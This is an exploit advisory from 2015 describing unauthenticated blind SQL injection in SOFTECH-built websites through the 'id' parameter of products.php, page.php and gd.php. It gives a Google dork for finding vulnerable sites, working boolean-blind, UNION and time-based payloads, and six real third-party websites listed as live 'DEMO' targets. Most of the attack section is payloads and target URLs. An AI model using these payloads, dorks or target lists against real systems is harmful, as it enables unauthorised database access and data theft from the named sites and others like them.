facebook facebook twitter rss

SOFTECH Multiple file Blind Sql Injection Vulnerability

Author: Shelesh Rauthan , Published: 13-06-2015
=========================================================
[+] Title :- SOFTECH Multiple file Blind Sql Injection Vulnerability
[+] Date :- 13 - June - 2015
[+] Vendor Homepage: :- http://www.softech.pk/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- inurl:"php?id=" "Developed By: SOFTECH"
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK
[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id
[+] Vulnerable File :- products.php, page.php, gd.php
[+] Affected Area(s) :- Entire admin, database, Server
=========================================================

[+] About :- Unauthenticated SQL Injection via "products.php", "page.php", "gd.php", causing an SQL error


[+] SQL vulnerable File location:- /home/DOMAIN/public_html/gd.php
/home/DOMAIN/public_html/products.php
/home/DOMAIN/public_html/page.php


[+] POC :- http://127.0.0.1/products.php?id=[SQL]'

The sql Injection web vulnerability can be be exploited by remote attackers without privilege of web-application user account or user interaction.

Place: GET/POST
Parameter: id
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: id=4' RLIKE (SELECT (CASE WHEN (7475=7475) THEN 4 ELSE 0x28 END)) AND 'jWbl'='jWbl

Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: id=-4019' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f697771,0x50614c515968614f6e5a,0x716d617371),NULL,NULL,NULL,NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=4' AND SLEEP(5) AND 'xJxK'='xJxK


[+] DEMO :- http://sadapak.com/gd.php?id=4
http://www.saddlederiders.com/products.php?id=14
http://www.regentarchery.com/products.php?id=8
http://www.betterstyleracing.com/products.php?id=89
http://www.rehmanmalik.com/page.php?id=7
http://fullstopintl.com/products.php?id=2

=========================================================

Like us on Facebook :